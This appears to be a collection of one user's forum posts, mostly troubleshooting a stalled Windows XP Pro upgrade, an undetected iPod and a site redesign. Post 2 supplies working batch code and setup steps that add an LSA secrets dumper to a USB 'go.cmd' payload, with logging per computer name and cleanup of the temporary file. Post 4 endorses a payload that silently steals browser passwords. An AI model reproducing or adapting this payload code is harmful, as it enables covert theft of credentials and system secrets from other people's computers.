  1. First off, remove everything from the /WIP directory and misc cracking files. And download the launcher installer from the site... http://www.sandisk.com/Retail/Default.aspx?CatID=1411 That should fix it for you.
  2. For those who have encountered a failed LSA Secret extraction, I found a fix. First, download the console version of the program: http://www.nirsoft.net/utils/lsasecretsdump.zip Second, place into the /WIP/CMD/ directory and rename to lsadump.exe Third, replace the original LSA Secrets code in the go.cmd with this: Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ***********[Dump LSA secrets]******* >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .lsadump.exe >> "....Documentslogfiles%computername%_LSA.log" >> ....Documentslogfiles%computername%.log 2>&1 copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_lsa.log* ....Documentslogfiles%computername%.log >> nul del /f /q "....Documentslogfiles%computername%_lsa.log" >nul And there you have it. A working LSA Dumper!
  3. Note: I got lazy and didn't read anyone else's feedback so excuse me if the topic has been beaten to death. I think the structure of the site seems perfect, thought I doubt that colour of orange, especially acting as a buffer to the white and blue. It would be nice to see it as a 75% width-of-screen stretching template with a nice patterned background. And make the bare-minimum width 800px as usual. The search field could be better with the white to show contrast within the template. And the slogan of TYTL is perfect with the w2.0 fade. But I would take that a step further and give the whole bar a shine. The orange.... Well, it seems like a sore thumb in a flawless hand. I suggest choosing a different shade of OJ or a different colour altogether... http://kuler.adobe.com is a nice place to look / create decent swatches. I enjoy the the content of the orange area and whatnot. This is how I would see it: http://img186.imageshack.us/img186/4632/templatezp5.jpg
  4. Spektormax's payload steals IE and Firefox passwords, I believe. http://www.hak5.org/wiki/USB_Switchblade#S...well_as_an_Nmap Oh and his also runs quite silently as well.
  5. I plan to have the ORTAI ready by the time MD5 generations begin... Yeah delays, delays. Anyone willing to contribute, contact me.
  6. Downloaded the utility. Got a folder full of .inf & .cat files, where do these go?
  7. Hmm... It appears my WebCam can no longer be detected either.... You're prolly right, backup and fresh install.
  8. Ran Windows XP Home SP2 before upgrading to Pro. Have tried using my iPod on other computers, they worked flawlessly. Somewhere along the line, someone was messed up on my computer.
  9. With Windows XP Professional's Disk. You can do the following installations: 1. Upgrade (Recommended) - Installs Windows XP Pro on your current system by only upgrading the core system files. This means your data is not touched during the installation. 2. Install - Installs Windows XP Pro on your computer I chose upgrade, so all of my files, settings, registries (I think), remained.
  10. Well I do remember seeing that the iPod is FAT32 and I did turn the windows partition to NTFS prior to installing windows pro.
  11. Checked that, it says: "Generic CardBus Controller" And it was disabled.. So now I enabled it. And some old printer driver that never worked. Lets see if it works! And the verdict is.... no.
  12. Well, I have recently upgraded my laptop to Windows XP Pro SP2. Of course I only upgraded the filesystem, so everything stayed the same. But since the upgrade I cannot get my iPod to appear in my iTunes or Windows Explorer. I have: Resintalled iTunes Rebooted Computer The Fives Rs (Reset, Retry, Restart, Reinstall, Restore) on the iPod Did all possible variables that was mentioned on the Apple support site. What happenned? [EDIT] Also, when I connect the iPod, I get the "doo-dee" noise, the "Do Not Disconnect: on the ipod, and I see "Safely Remove Hardware" in the taskbar with the name "USB Mass Storage Device -> Apple iPod Storage Device".
  13. Ok, sorry for double post, but it appears that the reason why it hangs is because soundman.exe can't be found on the disk. So! I can reboot and setup can continue no problem, and it appears that my files are intact at this point. What do I do about the soundman.exe problem? This never happenned on the 4 other computers I have upgraded with this disk with... Again thanks for the support
  14. Oh god but I got cocky. This was the 5th computer that was getting upgraded... And they all worked out.. I knew it, my laptop is way too tweaked out to have a smooth upgrade. Please anyone else, share your thoughts and ideas. [EDIT] I do have a linux live cd, but how do I go in and try to retrieve data if the live disk is in the tray? You think I can try to send it over the network to another computer?
  15. Well folks, it happenned. I have here beside a computer that has hung after around 30 minutes of upgrading from Windows XP Home to Professional. At the "Installing Windows" phase, at "Installing Devices" part of that section... I got a window asking for the driver for the Realtec Sound Driver yada yada yada and mentioned something about soundman.exe. I tried to press ok, but no drivers were found. So I clicked cancel. It hung. What can I do? I dare not reboot until I get some advice from you guys. Are my files safe?
